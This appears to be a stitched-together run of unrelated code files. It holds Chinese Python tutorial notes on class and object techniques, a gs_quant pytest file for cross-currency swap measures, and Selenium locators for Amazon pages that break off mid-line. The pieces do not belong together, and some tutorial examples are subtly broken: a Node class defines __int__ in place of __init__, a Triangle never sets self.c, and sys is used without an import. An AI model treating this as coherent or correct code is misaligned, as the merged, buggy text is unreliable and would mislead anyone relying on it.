如何统计序列中元素的出现频度 2-4 如何根据字典中值的大小, 对字典中的项排序 2-5 如何快速找到多个字典中的公共键(key) 2-6 如何让字典保持有序 2-7 如何实现用户的历史记录功能(最多n条) 第3章 对象迭代与反迭代技巧训练 3-1 如何实现可迭代对象和迭代器对象(1) 3-2 如何实现可迭代对象和迭代器对象(2) 3-3 如何使用生成器函数实现可迭代对象 3-4 如何进行反向迭代以及如何实现反向迭代 3-5 如何对迭代器做切片操作 3-6 如何在一个for语句中迭代多个可迭代对象 第4章 字符串处理技巧训练 4-1 如何拆分含有多种分隔符的字符串 4-2 如何判断字符串a是否以字符串b开头或结尾 4-3 如何调整字符串中文本的格式 4-4 如何将多个小字符串拼接成一个大的字符串 4-5 如何对字符串进行左, 右, 居中对齐 4-6 如何去掉字符串中不需要的字符 
第5章 文件I/O高效处理技巧训练 5-1 如何读写文本文件 5-2 如何处理二进制文件 5-3 如何设置文件的缓冲 5-4 如何将文件映射到内存 5-5 如何访问文件的状态 5-6 如何使用临时文件 第6章 csv,json,xml,excel高效解析与构建技巧训练 6-1 如何读写csv数据 6-2 如何读写json数据 6-3 如何解析简单的xml文档 6-4 如何构建xml文档 6-5 如何读写excel文件 第7章 类与对象深度技术进阶训练 7-1 如何派生内置不可变类型并修改实例化行为 7-2 如何为创建大量实例节省内存 7-3 如何让对象支持上下文管理 7-4 如何创建可管理的对象属性 7-5 如何让类支持比较操作 7-6 如何使用描述符对实例属性做类型检查 7-7 如何在环状数据结构中管理内存 7-8 如何通过实例方法名字的字符串调用方法 第8章 多线程编程核心技术应用进阶训练 8-1 如何使用多线程 8-2 如何线程间通信 8-3 如何在线程间进行事件通知 8-4 如何使用线程本地数据 8-5 如何使用线程池 8-6 如何使用多进程 第9章 装饰器使用技巧进阶训练 9-1 如何使用函数装饰器 9-2 如何为被装饰的函数保存元数据 9-3 如何定义带参数的装饰器 9-4 如何实现属性可修改的函数装饰器 9-5 如何在类中定义装饰器 """ """ 7-1 如何派生内置不可变类型并修改实例化行为 实际案例: 我们想自定义一种新类型的元组,对于传入的可迭代对象,我们只保留作其中int类型且大于0的元素,例如: IntTuple([1,-1,'abc',6,['x','y'],3])=>(1,6,3) 要求IntTuple是内置tuple的子类,如何实现? 解决方案: 定义类IntTuple继承内置tuple,并实现__new__,修改实例化行为 """ """ class IntTuple(tuple): # new先于init方法创建执行 def __new__(cls,iterable): g = (x for x in iterable if isinstance(x,int) and x > 0) print(g) return super(IntTuple,cls).__new__(cls,g) # 创建构造器 def __init__(self,iterable): # before print(self) #super(IntTuple,self).__init__(iterable) # after t = IntTuple([1,-1,'abc',6,['x','y'],3]) print(t) """ """ 7-2 如何为创建大量实例节省内存 实际案例: 某网络游戏中,定义了玩家类Player(id,name,status,...)每有一个在线玩家,在服务器程序内则有一个Player的实例,当在线人数很多时,将产生大量实例(如百万级) 如何降低这些大量实例的内存开销? 解决方案: 定义类的__slots__属性,它是用来声明实例属性名字的列表 """ """ class Player(object): def __init__(self,uid,name,status=0,level=1): self.uid = uid self.name = name self.status = status self.level = level class Player2(object): __slots__ = ['uid','name','status','level'] def __init__(self,uid,name,status=0,level=1): self.uid = uid self.name = name self.status = status self.level = level p1 = Player('0001','Jim') p2 = Player2('0001','Jim') print(dir(p1)) print(dir(p2)) print(set(dir(p1))) print(set(dir(p2))) print(set(dir(p1)) - set(dir(p2))) print(p1.__dict__) p1.x = 123 print(p1.x) print(p1.__dict__) p1.__dict__['y'] = 99 print(p1.y) print(p1.__dict__) # __dict__ 占用内存 del p1.__dict__['x'] # print(p1.x) print(sys.getsizeof(p1.__dict__)) # 这个字典占用了320个字节 # 关闭动态属性绑定,提前声明 __slots__ 有哪些空间保存哪些属性,阻止属性绑定 """ """ 7-3 如何让对象支持上下文管理 with open('demo.txt','w') as f: f.write('abcdef') f.writelines(['wyz\n','123\n']) # f.close() 实际案例: 我们实现了一个telnet客户端的类TelnetClient,调用实例的start()方法启动客户端与服务器交互,交互完毕后需要调用cleanup()方法,关闭已连接的socket,以及将操作历史记录写入文件并关闭 能否让TelnetClient的实例支持上下文管理协议,从而替代手工调用cleanup()方法 解决方案: 实现上下文管理协议,需定义实现的__enter__,__exit__方法,它们分别在with开始和结束时被调用 """ """ from telnetlib import Telnet from sys import stdin,stdout from collections import deque class TelnetClient(object): def __init__(self,addr,port=23): self.addr = addr self.port = port self.tn = None def start(self): self.tn = Telnet(self.addr,self.port) self.history = deque() # user t = self.tn.read_until('login: ') stdout.write(t) user = stdin.readline() self.tn.write(user) # password t = self.tn.read_until('Password: ') if t.startswith(user[:-1]):t = t[len(user) + 1:] stdout.write(t) self.tn.write(stdin.readline()) t = self.tn.read_until('$ ') stdout.write(t) while True: uinput = stdin.readline() if not uinput: break self.history.append(uinput) self.tn.write(uinput) t = self.tn.read_until('$ ') stdout.write(t[len(uinput) + 1:]) def cleanup(self): self.tn.close() self.tn = None with open(self.addr + '_history.txt','w') as f: f.writelines(self.history) client = TelnetClient('192.168.179.128') print('\nstart...') client.start() print('\ncleanup') """ """ from telnetlib import Telnet from sys import stdin, stdout from collections import deque class TelnetClient(object): def __init__(self, addr, port=23): self.addr = addr 
self.port = port self.tn = None def start(self): raise Exception('Test') # user t = self.tn.read_until('login: ') stdout.write(t) user = stdin.readline() self.tn.write(user) # password t = self.tn.read_until('Password: ') if t.startswith(user[:-1]): t = t[len(user) + 1:] stdout.write(t) self.tn.write(stdin.readline()) t = self.tn.read_until('$ ') stdout.write(t) while True: uinput = stdin.readline() if not uinput: break self.history.append(uinput) self.tn.write(uinput) t = self.tn.read_until('$ ') stdout.write(t[len(uinput) + 1:]) def cleanup(self): pass def __enter__(self): self.tn = Telnet(self.addr,self.port) self.history = deque() return self def __exit__(self, exc_type, exc_val, exc_tb): print('In __exit__') self.tn.close() self.tn = None with open(self.addr + '_history.txt', 'w') as f: f.writelines(self.history) return True # 对这个对象使用with方法,会进入enter方法,enter需要返回值 with TelnetClient('127.0.0.1') as client: client.start() print('End') """ """ 7-4 如何创建可管理的对象属性 实际案例: 在面向对象编程中,我们把方法(函数)看作对象的接口,直接访问对象的属性可能是不安全的,或设计上不够灵活,但是使用调用方法在形式上不如访问属性简洁 circle.getRadius() circle.setRadius(5.0) #繁 circle.radius circle.radius = 5.0 #简 能否在形式上是属性访问,但实际上调用方法? 解决方案: 使用property函数为类创建可管理属性,fget/fset/fdel对应相应属性访问 """ """ from math import pi class Circle(object): def __init__(self,radius): self.radius = radius def getRadius(self): return round(self.radius,2) def setRadius(self,value): if not isinstance(value,(int,float)): raise ValueError('wrong type') self.radius = float(value) def getArea(self): return self.radius ** 2 * pi R = property(getRadius,setRadius) # 调用方法,比较灵活,只需要改方法返回值或者某些参数 c = Circle(3.2) #c.getRadius() print(c.R) c.R = 5.9 print(c.R) # 类型错误,无法识别 # c.radius = 'abc' # d = c.radius * 2 # print(d) """ """ 7-5 如何让类支持比较操作 实际案例: 有时我们希望自定义的类,实例间可以使用<,<=,>,>=,==,!=符号进行比较,我们自定义比较的行为,例如,有一个矩形的类,我们希望比较两个矩形的实例时,比较的是他们的面积 解决方案: 比较符号运算符重载,需要实现一下方法: __lt__,__le__,__gt__,__ge__,__eq__,__ne__ 使用标准库下的functools下的类装饰器total_ordering可以简化此过程 """ """ from functools import total_ordering from abc import ABCMeta,abstractmethod @total_ordering class Shape(object): @abstractmethod def area(self): pass def __lt__(self, obj): print('in __lt__') if not isinstance(obj, Shape): raise TypeError('obj is not Shape') return self.area() < obj.area() def __eq__(self, obj): print('in __eq__') if not isinstance(obj, Shape): raise TypeError('obj is not Shape') return self.area() == obj.area() class Rectangle(Shape): def __init__(self,w,h): self.w = w self.h = h def area(self): return self.w * self.h class Circle(Shape): def __init__(self, r): self.r = r def area(self): return self.r ** 2 * 3.14 ''' def __le__(self, obj): return self < obj or self == obj def __gt__(self, obj): return not (self < obj or self == obj) ''' r1 = Rectangle(5,3) r2 = Rectangle(4,4) c1 = Circle(3) print(c1 <= r1 ) # r1.__lt__(r2) print(r1 > c1 ) # r1.__lt__(r2) print(r1 > 1) """ """ 7-6 如何使用描述符对实例属性做类型检查 实际案例: 在某项目中,我们实现了一些类,并希望能像静态类型语言那样(C、C++、Java),对它们的实例属性做类型检查 p = Person() p.name = 'Bob' # 必须是str p.age = 18 # 必须是int p.height = 1.83 # 必须是float 要求: 1.可以对实例变量名指定类型 2.赋予不正确类型时抛出异常 解决方案: 使用描述符来实现需要类型检查的属性,分别实现__get__、__set__、__delete__方法,在__set__内使用isinstance函数做类型检查 """ ''' class Attr(object): def __init__(self, name, type_): self.name = name self.type_ = type_ def __get__(self, instance, cls): return instance.__dict__[self.name] def __set__(self, instance, value): if not isinstance(value, self.type_): raise TypeError('expected an %s' % self.type_) instance.__dict__[self.name] = value def __delete__(self, instance): del instance.__dict__[self.name] class Person(object): 
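    # Each class attribute below is an Attr descriptor, so instance assignments go
    # through Attr.__set__ and raise TypeError when the value has the wrong type
    # (e.g. p.age = '17' at the end of this example).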
name = Attr('name', str) age = Attr('age', int) height = Attr('height', float) p = Person() p.name = 'Bob' print(p.name) p.age = '17' ''' """ 7-7 如何在环状数据结构中管理内存 实际案例: 在python中,垃圾回收器通过引用计数来回收垃圾对象,但某些环状数据结构(树、图...),存在对象间的循环引用,比如树的父节点引用子节点,子节点也同时引用父节点,此时同时del掉引用父子节点,两个对象不能被立即回收 如何解决此类的内存管理问题? 解决方案: 使用标准库weakref,它可以创建一种能访问对象但不增加引用计数的对象 """ ''' class A(object): def __del__(self): print('in A.__del__') a = A() import sys a2 = a # 查看引用计数 print(sys.getrefcount(a) - 1) del a2 print(sys.getrefcount(a) - 1) a = 5 # 当计数变为0,调用__del__方法 ''' """ class Data(object): def __init__(self, value, owner): self.owner = owner self.value = value def __str__(self): return "%s's data, value is %s" %(self.owner,self.value) def __del__(self): print('in Data.__del__') class Node(object): def __int__(self,value): self.data = Data(value, self) def __del__(self): print('in node.__del__') node = Node() import gc gc.collect() input('wait....') """ ''' class A(object): def __del__(self): print('in A.__del__') a = A() import sys print(sys.getrefcount(a) - 1) import weakref a_wref = weakref.ref(a) a2 = a_wref() print(a is a2) print(sys.getrefcount(a) - 1) del a del a2 print(a_wref()) print(a_wref() is None) ''' ''' import weakref class Data(object): def __init__(self, value, owner): self.owner = weakref.ref(owner) self.value = value def __str__(self): return "%s's data, value is %s" % (self.owner(), self.value) def __del__(self): print('in Data.__del__') class Node(object): def __int__(self, value): self.data = Data(value, self) def __del__(self): print('in node.__del__') node = Node() del node input('wait...') ''' ''' 7-8 如何通过实例方法名字的字符串调用方法 实际案例: 某项目中,我们的代码使用了3个不同库中的图形类:Circle、Triangle、Rectangle,他们都有一个获取图形面积的接口(方法),但接口名字不同,我们可以实现一个统一的获取面积的函数,使用每种方法名进行尝试,调用相应类的接口 解决方案: 方法1:使用内置函数getattr,通过名字在实例上获取方法对象,然后调用 方法2:使用标准库operator下的methodcaller函数调用 ''' ''' class Circle(object): def __init__(self,r): self.r = r def area(self): return self.r ** 2 * 3.14 class Rectangle(object): def __init__(self,w,h): self.w = w self.h = h def get_area(self): return self.w * self.h class Triangle(object): def __init__(self, a, b, c): self.a = a self.b = b def getArea(self): a, b, c = self.a,self.b,self.c p = (a + b + c) / 2 area = (p * (p - a) * (p - b) * (p - c)) ** 0.5 return area def getArea(shape): for name in ('area','getArea','get_area'): f = getattr(shape, name, None) if f: return f() shape1 = Circle(2) shape2 = Triangle(3, 4, 5) shape3 = Rectangle(6, 4) shapes = [shape1,shape2,shape3] print(map(getArea,shapes)) ''' """ from operator import methodcaller s = 'abc123abc456' print(s.find('abc',4)) print(methodcaller('find','abc',4)) print(methodcaller('find','abc',4)(s)) """ <filename>gs_quant/test/timeseries/test_measures_xccy.py """ Copyright 2020 <NAME>. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
""" import datetime as dt import pandas as pd import pytest from pandas.testing import assert_series_equal from testfixtures import Replacer from testfixtures.mock import Mock import gs_quant.timeseries.measures_xccy as tm import gs_quant.timeseries.measures as tm_rates from gs_quant.api.gs.assets import GsAsset from gs_quant.api.gs.data import GsDataApi, MarketDataResponseFrame from gs_quant.errors import MqError, MqValueError from gs_quant.session import GsSession, Environment from gs_quant.target.common import PricingLocation, Currency as CurrEnum from gs_quant.test.timeseries.utils import mock_request from gs_quant.timeseries import Currency, Cross, Bond, CurrencyEnum, SecurityMaster from gs_quant.timeseries.measures_xccy import _currency_to_tdapi_crosscurrency_swap_rate_asset, \ CROSSCURRENCY_RATES_DEFAULTS, TdapiCrossCurrencyRatesDefaultsProvider _index = [pd.Timestamp('2021-03-30')] _test_datasets = ('TEST_DATASET',) def test_get_floating_rate_option_for_benchmark_retuns_rate(): provider = TdapiCrossCurrencyRatesDefaultsProvider(CROSSCURRENCY_RATES_DEFAULTS) value = provider.get_rateoption_for_benchmark(CurrencyEnum.GBP, "LIBOR") assert value == "GBP-LIBOR-BBA" def test_get_floating_rate_option_for_benchmark_retuns_rate_usd(): provider = TdapiCrossCurrencyRatesDefaultsProvider(CROSSCURRENCY_RATES_DEFAULTS) value = provider.get_rateoption_for_benchmark(CurrencyEnum.USD, "LIBOR") assert value == "USD-LIBOR-BBA" def test_currency_to_tdapi_xccy_swap_rate_asset(mocker): replace = Replacer() mocker.patch.object(GsSession.__class__, 'current', return_value=GsSession.get(Environment.QA, 'client_id', 'secret')) mocker.patch.object(GsSession.current, '_get', side_effect=mock_request) mocker.patch.object(SecurityMaster, 'get_asset', side_effect=mock_request) bbid_mock = replace('gs_quant.timeseries.measures_xccy.Asset.get_identifier', Mock()) with tm_rates.PricingContext(dt.date.today()): cur = [ { "currency_assetId": "MAK1FHKH5P5GJSHH", "currency": "JPY", "xccy_id": "MAFMW4HJC5TDE51H" }, { "currency_assetId": "MA66CZBQJST05XKG", "currency": "GBP", "xccy_id": "MATDD783JM1C2GGD" }, { "currency_assetId": "MAJNQPFGN1EBDHAE", "currency": "EUR", "xccy_id": "MAW8SAXPSKYA94E2" }, ] for c in cur: print(c) asset = Currency(c.get("currency_assetId"), c.get("currency")) bbid_mock.return_value = c.get("currency") mqid = _currency_to_tdapi_crosscurrency_swap_rate_asset(asset) assert mqid == c.get("xccy_id") bbid_mock.return_value = None assert _currency_to_tdapi_crosscurrency_swap_rate_asset(asset) == c.get("currency_assetId") replace.restore() def test_get_crosscurrency_swap_leg_defaults(): result_dict = dict(currency=CurrEnum.JPY, rateOption="JPY-LIBOR-BBA", designatedMaturity="3m", pricing_location=PricingLocation.TKO) defaults = tm._get_crosscurrency_swap_leg_defaults(CurrEnum.JPY, tm.CrossCurrencyRateOptionType.LIBOR) assert result_dict == defaults result_dict = dict(currency=CurrEnum.EUR, rateOption="EUR-EURIBOR-TELERATE", designatedMaturity="3m", pricing_location=PricingLocation.LDN) defaults = tm._get_crosscurrency_swap_leg_defaults(CurrEnum.EUR, tm.CrossCurrencyRateOptionType.LIBOR) assert result_dict == defaults result_dict = dict(currency=CurrEnum.EUR, rateOption="EUR-EONIA-OIS-COMPOUND", designatedMaturity="3m", pricing_location=PricingLocation.LDN) defaults = tm._get_crosscurrency_swap_leg_defaults(CurrEnum.EUR, tm.CrossCurrencyRateOptionType.OIS) assert result_dict == defaults result_dict = dict(currency=CurrEnum.GBP, rateOption="GBP-LIBOR-BBA", designatedMaturity="3m", 
pricing_location=PricingLocation.LDN) defaults = tm._get_crosscurrency_swap_leg_defaults(CurrEnum.GBP, tm.CrossCurrencyRateOptionType.LIBOR) assert result_dict == defaults result_dict = dict(currency=CurrEnum.GBP, rateOption="GBP-LIBOR-BBA", designatedMaturity="3m", pricing_location=PricingLocation.LDN) defaults = tm._get_crosscurrency_swap_leg_defaults(CurrEnum.GBP, None) assert result_dict == defaults def test_get_crosscurrency_swap_csa_terms(): valid_ccy = ['EUR', 'GBP', 'JPY'] for ccy in valid_ccy: assert dict(csaTerms=ccy + '-1') == \ tm._get_crosscurrency_swap_csa_terms(ccy, tm.CrossCurrencyRateOptionType.LIBOR.value) def test_check_valid_indices(): valid_indices = ['LIBOR'] for index in valid_indices: assert tm.CrossCurrencyRateOptionType[index] == tm._check_crosscurrency_rateoption_type(CurrencyEnum.GBP, index) invalid_indices = ['LIBORED', 'TestRateOption'] for index in invalid_indices: with pytest.raises(MqError): tm._check_crosscurrency_rateoption_type(CurrencyEnum.GBP, index) def test_get_tdapi_crosscurrency_rates_assets(mocker): mock_asset_1 = GsAsset(asset_class='Rate', id='MAW8SAXPSKYA94E2', type_='XccySwapMTM', name='Test_asset') mock_asset_2 = GsAsset(asset_class='Rate', id='MATDD783JM1C2GGD', type_='XccySwapMTM', name='Test_asset') replace = Replacer() assets = replace('gs_quant.timeseries.measures.GsAssetApi.get_many_assets', Mock()) assets.return_value = [mock_asset_1] assert 'MAW8SAXPSKYA94E2' == tm._get_tdapi_crosscurrency_rates_assets() replace.restore() assets = replace('gs_quant.timeseries.measures.GsAssetApi.get_many_assets', Mock()) assets.return_value = [mock_asset_1, mock_asset_2] kwargs = dict(asset_parameters_termination_date='5y', asset_parameters_effective_date='0b') with pytest.raises(MqValueError): tm._get_tdapi_crosscurrency_rates_assets(**kwargs) replace.restore() assets = replace('gs_quant.timeseries.measures.GsAssetApi.get_many_assets', Mock()) assets.return_value = [] kwargs = dict(asset_parameters_clearing_house='NONE', asset_parameters_payer_rate_option="EUR-EURIBOR-TELERATE", asset_parameters_payer_currency='EUR', asset_parameters_payer_designated_maturity='3m', asset_parameters_receiver_rate_option="USD-LIBOR-BBA", asset_parameters_receiver_currency='USD', asset_parameters_receiver_designated_maturity='3m', pricing_location='LDN') with pytest.raises(MqValueError): tm._get_tdapi_crosscurrency_rates_assets(**kwargs) replace.restore() assets = replace('gs_quant.timeseries.measures.GsAssetApi.get_many_assets', Mock()) assets.return_value = [mock_asset_1, mock_asset_2] kwargs = dict() assert ['MAW8SAXPSKYA94E2', 'MATDD783JM1C2GGD'] == tm._get_tdapi_crosscurrency_rates_assets(**kwargs) replace.restore() # test case will test matching sofr maturity with libor leg and flipping legs to get right asset kwargs = dict(type='XccySwapMTM', asset_parameters_termination_date='5y', asset_parameters_payer_rate_option="EUR-EURIBOR-TELERATE", asset_parameters_payer_currency="EUR", asset_parameters_payer_designated_maturity='3m', asset_parameters_receiver_rate_option="USD-LIBOR-BBA", asset_parameters_receiver_currency="USD", asset_parameters_receiver_designated_maturity='3m', asset_parameters_clearing_house='None', asset_parameters_effective_date='5y', pricing_location='LDN') assets = replace('gs_quant.timeseries.measures.GsAssetApi.get_many_assets', Mock()) assets.return_value = [mock_asset_1] assert 'MAW8SAXPSKYA94E2' == tm._get_tdapi_crosscurrency_rates_assets(**kwargs) replace.restore() def mock_curr(_cls, _q): d = { 'xccySwapSpread': [1, 2, 3], } df = 
MarketDataResponseFrame(data=d, index=_index * 3) df.dataset_ids = _test_datasets return df def test_crosscurrency_swap_rate(mocker): replace = Replacer() args = dict(swap_tenor='5y', rateoption_type='LIBOR', clearing_house='LCH', forward_tenor='5y', real_time=False) mock_gbp = Currency('MA26QSMPX9990G66', 'GBP') args['asset'] = mock_gbp xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'GBP' xrefs = replace('gs_quant.timeseries.measures.SecurityMaster.get_asset', Mock()) mock_usd = Currency('MA26QSMPX9990G63', 'USD') xrefs.return_value = mock_usd args['swap_tenor'] = '5yr' with pytest.raises(MqValueError): tm.crosscurrency_swap_rate(**args) args['swap_tenor'] = '5y' args['forward_tenor'] = '5yr' with pytest.raises(MqValueError): tm.crosscurrency_swap_rate(**args) args['forward_tenor'] = '5y' args['real_time'] = True with pytest.raises(NotImplementedError): tm.crosscurrency_swap_rate(**args) args['real_time'] = False args['asset'] = Currency('MA666', 'AED') xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'AED' with pytest.raises(NotImplementedError): tm.crosscurrency_swap_rate(**args) args['asset'] = mock_gbp args['asset'] = Bond('MA667', 'TEST') with pytest.raises(MqValueError): tm.crosscurrency_swap_rate(**args) args['asset'] = mock_gbp args['asset'] = Cross('MA667', 'USDAED') xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.side_effect = ['AED', 'USD'] with pytest.raises(NotImplementedError): tm.crosscurrency_swap_rate(**args) args['asset'] = Cross('MA667', 'USDAED') xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.side_effect = ['USD', 'AED'] with pytest.raises(NotImplementedError): tm.crosscurrency_swap_rate(**args) args['asset'] = Cross('MA667', 'USDGBP') xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'GBP' xrefs = replace('gs_quant.timeseries.measures_xccy._check_crosscurrency_rateoption_type', Mock()) xrefs.side_effect = [tm.CrossCurrencyRateOptionType.LIBOR, tm.CrossCurrencyRateOptionType.OIS] with pytest.raises(MqValueError): tm.crosscurrency_swap_rate(**args) replace.restore() xrefs = replace('gs_quant.timeseries.measures.SecurityMaster.get_asset', Mock()) xrefs.return_value = mock_usd args['asset'] = Cross('MA667', 'USDGBP') xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'GBP' identifiers = replace('gs_quant.timeseries.measures_xccy._get_tdapi_crosscurrency_rates_assets', Mock()) identifiers.return_value = {'MA26QSMPX9990G66'} mocker.patch.object(GsDataApi, 'get_market_data', return_value=mock_curr(None, None)) actual = tm.crosscurrency_swap_rate(**args) expected = tm.ExtendedSeries([1, 2, 3], index=_index * 3, name='xccySwapSpread') expected.dataset_ids = _test_datasets assert_series_equal(expected, actual) assert actual.dataset_ids == _test_datasets args['asset'] = Cross('MA667', 'USDCAD') xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'CAD' identifiers = replace('gs_quant.timeseries.measures_xccy._get_tdapi_crosscurrency_rates_assets', Mock()) identifiers.return_value = {'MA26QSMPX9990G66'} mocker.patch.object(GsDataApi, 'get_market_data', return_value=mock_curr(None, None)) actual = tm.crosscurrency_swap_rate(**args) expected = tm.ExtendedSeries([1, 2, 3], index=_index * 3, name='xccySwapSpread') expected.dataset_ids = _test_datasets 
assert_series_equal(expected, actual) assert actual.dataset_ids == _test_datasets args['asset'] = mock_gbp xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'GBP' args['rateoption_type'] = tm.CrossCurrencyRateOptionType.TestRateOption with pytest.raises(MqValueError): tm.crosscurrency_swap_rate(**args) args['rateoption_type'] = tm.CrossCurrencyRateOptionType.LIBOR xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'GBP' identifiers = replace('gs_quant.timeseries.measures_xccy._get_tdapi_crosscurrency_rates_assets', Mock()) identifiers.return_value = {'MA26QSMPX9990G66'} mocker.patch.object(GsDataApi, 'get_market_data', return_value=mock_curr(None, None)) actual = tm.crosscurrency_swap_rate(**args) expected = tm.ExtendedSeries([1, 2, 3], index=_index * 3, name='xccySwapSpread') expected.dataset_ids = _test_datasets assert_series_equal(expected, actual) assert actual.dataset_ids == _test_datasets xrefs = replace('gs_quant.timeseries.measures.Asset.get_identifier', Mock()) xrefs.return_value = 'EUR' identifiers = replace('gs_quant.timeseries.measures_xccy._get_tdapi_crosscurrency_rates_assets', Mock()) identifiers.return_value = {'MAZBW57ZPS54ET7K'} mocker.patch.object(GsDataApi, 'get_market_data', return_value=mock_curr(None, None)) args['asset'] = Currency('MAZBW57ZPS54ET7K', 'EUR') args['rateoption_type'] = 'OIS' actual = tm.crosscurrency_swap_rate(**args) expected = tm.ExtendedSeries([1, 2, 3], index=_index * 3, name='xccySwapSpread') expected.dataset_ids = _test_datasets assert_series_equal(expected, actual) assert actual.dataset_ids == _test_datasets replace.restore() if __name__ == '__main__': pytest.main(args=["test_measures_xccy.py"]) from selenium.webdriver.common.by import By class MainPageLocators: LOGO_URL = 'https://www.amazon.com/ref=nav_logo' LOGO = (By.ID, "nav-logo-sprites") # The hrefs below in the first small images when page loads DESKTOP_GRID_1 = (By.XPATH, "//*[@id='desktop-grid-1']/div/div[3]/a") DESKTOP_GRID_2 = (By.XPATH, "//*[@id='desktop-grid-2']/div/div[3]/a") DESKTOP_GRID_3 = (By.XPATH, "//*[@id='desktop-grid-3']/div/div[3]/a") DESKTOP_GRID_4 = (By.XPATH, "//*[@id='desktop-grid-4']/div/div[3]/a") DESKTOP_GRID_5 = (By.XPATH, "//*[@id='desktop-grid-5']/div/div[3]/a") DESKTOP_GRID_6 = (By.XPATH, "//*[@id='desktop-grid-6']/div/div[3]/a") DESKTOP_GRID_7 = (By.XPATH, "//*[@id='desktop-grid-7']/div/div[3]/a") DESKTOP_GRID_1_D2 = (By.CSS_SELECTOR, "img[alt='We ship 45 million products around the world']") # The hrefs below in the 4 small images in the middle DESKTOP_BTF_GRID_1 = (By.XPATH, "//*[@id='desktop-btf-grid-1']/div/div[3]/a") DESKTOP_BTF_GRID_2 = (By.XPATH, "//*[@id='desktop-btf-grid-2']/div/div[3]/a") DESKTOP_BTF_GRID_3 = (By.XPATH, "//*[@id='desktop-btf-grid-3']/div/div[3]/a") DESKTOP_BTF_GRID_4 = (By.XPATH, "//*[@id='desktop-btf-grid-4']/div/div[3]/a") # Top title text in the first 7 small img when page loads TITLE_GRID_1 = (By.XPATH, "//*[@id='desktop-grid-1']/div/div[1]/h2") TITLE_GRID_2 = (By.XPATH, "//*[@id='desktop-grid-2']/div/div[1]/h2") TITLE_GRID_3 = (By.XPATH, "//*[@id='desktop-grid-3']/div/div[1]/h2") TITLE_GRID_4 = (By.XPATH, "//*[@id='desktop-grid-4']/div/div[1]/h2") TITLE_GRID_5 = (By.XPATH, "//*[@id='desktop-grid-5']/div/div[1]/h2") TITLE_GRID_6 = (By.XPATH, "//*[@id='desktop-grid-6']/div/div[1]/h2") TITLE_GRID_7 = (By.XPATH, "//*[@id='desktop-grid-7']/div/div[1]/h2") # Category titles after clicking hrefs at the top of the page TITLE_AMAZONBASIC = 
(By.XPATH, "//*[@id='search']/span/div/span/h1/div/div[1]/div/div/span[3]") TITLE_SHOP_BY_CAT = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_ELECTRONICS = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_COMPUTERS_ACCESSORIES = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_SHOP_TOP = (By.CSS_SELECTOR, "img[alt='Shop top categories']") TITLE_BEUATY_PICKS = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_GET_FIT = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_DEALS_PROM = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_EASY_RETURNS = (By.XPATH, "/html/body/div[2]/div[2]/div[1]/div/div[3]/h1") TITLE_SHIPS_WORLDWIDE = (By.XPATH, "//*[@id='a-page']/div[2]/div/div/div/div/div/div/div/div[3]/div[1]/div[2]/div/h1") TITLE_IDEAL_TV = (By.XPATH, "//*[@id='departments']/ul/li[2]/span/a/span[2]") # Category titles after clicking hrefs at the middle of the page TITLE_COMFY_STYLES = (By.XPATH, "//*[@id='a-page']/div[2]/div[2]/div[1]/div[1]/div/h1") TITLE_LAPTOP_TABLETS = (By.XPATH, "//*[@id='departments']/ul/li[2]/span/span") TITLE_HOME_BEDDING = (By.XPATH, "//*[@id='search']/span/div/span/h1/div/div[1]/div/div/span[3]") TITLE_STRIP_LIGHTS = (By.XPATH, "//*[@id='search']/span/div/span/h1/div/div[1]/div/div/span[3]") BACK_TO_TOP = (By.ID, "navBackToTop") # Button at the bottom LOGO_BOTTOM = (By.XPATH, "//*[@id='navFooter']/div[3]/span[1]/div/a/div") LANG_CHANGE = (By.CSS_SELECTOR, "img[alt='Shop in 8 different languages']") class LangPageLocators: ENGLISH_CHECK = (By.XPATH, "//*[@id='customer-preferences']/div/div/form/div[1]/div[1]/div[1]/div/label") ESPANOL_CHECK = (By.XPATH, "//*[@id='customer-preferences']/div/div/form/div[1]/div[1]/div[2]/div/label") DEUTSCH_CHECK = (By.XPATH, "//*[@id='customer-preferences']/div/div/form/div[1]/div[1]/div[4]/div/label") PORTUGUES_CHECK = (By.XPATH, "//*[@id='customer-preferences']/div/div/form/div[1]/div[1]/div[5]/div/label") TEXT_BOX = (By.ID, "icp-sl-t-text") # Text box on the right CURRENCY_SET = (By.ID, "a-autoid-0-announce") CURRENCY_TEXT = (By.ID, "icp-sc-note") # Text box on the bottom USD = (By.ID, "icp-sc-dropdown_1") ARS = (By.ID, "icp-sc-dropdown_3") EURO = (By.ID, "icp-sc-dropdown_23") HONG_KONG = (By.ID, "icp-sc-dropdown_27") NOK = (By.ID, "icp-sc-dropdown_46") POUNDS = (By.ID, "icp-sc-dropdown_51") VND = (By.ID, "icp-sc-dropdown_64") CANCEL_BUTTON = (By.ID, "icp-btn-close-announce") class RegisterPageLocators: DROP_MENU = (By.ID, "nav-link-accountList") # Navbar on the home page SIGN_UP = (By.XPATH, "//*[@id='nav-flyout-ya-newCust']/a") CREATE_ACC_BUTTON = (By.ID, "continue") NAME_ALERT = (By.XPATH, 